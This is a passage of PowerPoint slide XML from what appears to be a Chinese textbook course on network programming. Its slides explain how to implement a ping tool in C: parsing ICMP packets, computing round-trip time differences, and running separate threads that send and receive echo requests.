              <a:t>报文，并打印结果。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>为剥去了以太网部分数据的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>数据报文，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>为数据长度。可以利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>头部的参数快速地跳到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>报文部分，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>结构的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ip_hl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>标识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>头部的长度，由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ip_hl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>标识的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>字节单位，所以需要乘以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>来获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>段的地址。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3692825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13.6.5  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>计算时间差</a:t>
            </a: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smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>由于需要评估网络状况，在发送数据报文的时候保存发送时间，接收到报文后，计算两个时刻之间的差值，生成了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>源主机和目标主机之间的网络状况的时间评估。</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static struct timeval icmp_tvsub(struct timeval end,struct timeval begin)</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timeval tv;</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计算差值</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tv.tv_sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>= end.tv_sec - begin.tv_sec;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>            tv.tv_usec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>= end.tv_usec - begin.tv_usec;</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如果接收时间的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>usec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>值小于发送时的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>usec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>值，从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>usec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>域借位</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if(tv.tv_usec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt; 0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>            {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>                  tv.tv_sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>--;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>                 tv.tv_usec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>+= 1000000; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>              }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>               return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tv;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>}</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3050107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13.6.6  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>发送报文</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发送报文函数是一个线程，每隔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>向目的主机发送一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>回显请求报文，它在整个程序处于激活状态（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>alive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>）时一直发送报文。</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）获得当前的时间值，按照序列号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>packet_send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>报文打包到缓冲区</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>send_buff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>中后，发送到目的地址。发送成功后，记录发送报文的状态：</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）在线程开始进入主循环</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>while(alive)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>之前，将整个程序的开始发送时间记录下来，用于在程序退出的时候进行全局统计，即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>gettimeofday(&amp;tv_begin,NULL)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>，将时间保存在变量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tv_begin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>中。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3074164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13.6.7  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>接收报文</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与发送函数一样，接收报文也用一个线程实现，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>select()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>轮询等待报文到来。当接收到一个报文后使用函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icmp_unpack()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>来解包和查找报文之前发送时的记录，获取发送时间，计算收发差值并打印信息。</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）接收成功后将合法的报文记录重置为没有使用，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>。</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）接收报文数量增加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>。</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）为了防止丢包，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>select()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的轮询时间设置的比较短。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2422981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13.6.8  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>主函数过程</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ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>程序的实现使用了两个线程，一个线程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icmp_send()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>用于发送请求，一个线程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icmp_recv()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>用于接收远程主机的响应。当变量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>alive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>时，两个线程退出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>．</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>数据结构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>．信号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SIGINT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>．查找数组中的标识函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icmp_findpacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>．统计数据结果函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icmp_statistics()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3450606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ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>数据的数据结构</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rPr>
              <a:t>类型为结构</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>struct pingm_packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的变量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
